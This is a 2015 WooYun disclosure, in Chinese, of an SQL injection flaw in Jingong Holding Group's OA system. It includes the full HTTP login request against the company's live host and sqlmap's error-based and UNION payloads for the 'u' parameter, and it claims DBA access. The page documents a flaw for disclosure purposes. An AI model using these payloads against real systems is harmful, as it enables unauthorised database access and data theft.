当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138395

漏洞标题:精工控股集团某重要核心存在SQL注入且权限为DBA

相关厂商:精工控股集团

漏洞作者: 路人甲

提交时间:2015-09-02 18:57

修复时间:2015-10-17 18:58

公开时间:2015-10-17 18:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

精工控股集团(原浙江精工建设产业集团)是一家以六大产业板块——钢结构建筑、新型建材、房地产开发、高新纤维、金融、能源及投资为业务核心,多元化、跨地区的综合性集团公司,总资产130多亿元,员工近万人。集团在浙江、上海、北京、安徽等地拥有下属一级子公司10余家,为中国民营企业500强、中国制造企业500强、全国浙商100强。

详细说明:

存在漏洞的系统为:精工OA协同办公系统

http://www.jgsteel.cn/oa/


漏洞地址:

POST /services/eipajax.aspx?r=0.3453643461689353 HTTP/1.1
Host: www.jgsteel.cn
Proxy-Connection: keep-alive
Content-Length: 51
Accept: */*
Origin: http://www.jgsteel.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.jgsteel.cn/oa/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: BackURL=%2fsso%2fconnectoa.aspx
a=loginsystem&u=admin&p=admin&backUrl=&appSystem=OA


u参数存在注入

---
Parameter: u (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: a=loginsystem&u=admin') AND 1932=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(98)+CHAR(
118)+CHAR(113)+(SELECT (CASE WHEN (1932=1932) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+
CHAR(120)+CHAR(98)+CHAR(113))) AND ('npaG'='npaG&p=admin&backUrl=&appSystem=OA
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: a=loginsystem&u=admin') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+C
HAR(98)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(67)+CHAR(85)+CHAR(115)+CHAR(105)+CHAR(102)+CHAR(122)+CHAR
(83)+CHAR(80)+CHAR(83)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113),NULL,NULL,NULL-- &p=admin&ba
ckUrl=&appSystem=OA
---
[16:33:27] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008


漏洞证明:

数据库:

1.png


DBA权限

2.png


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝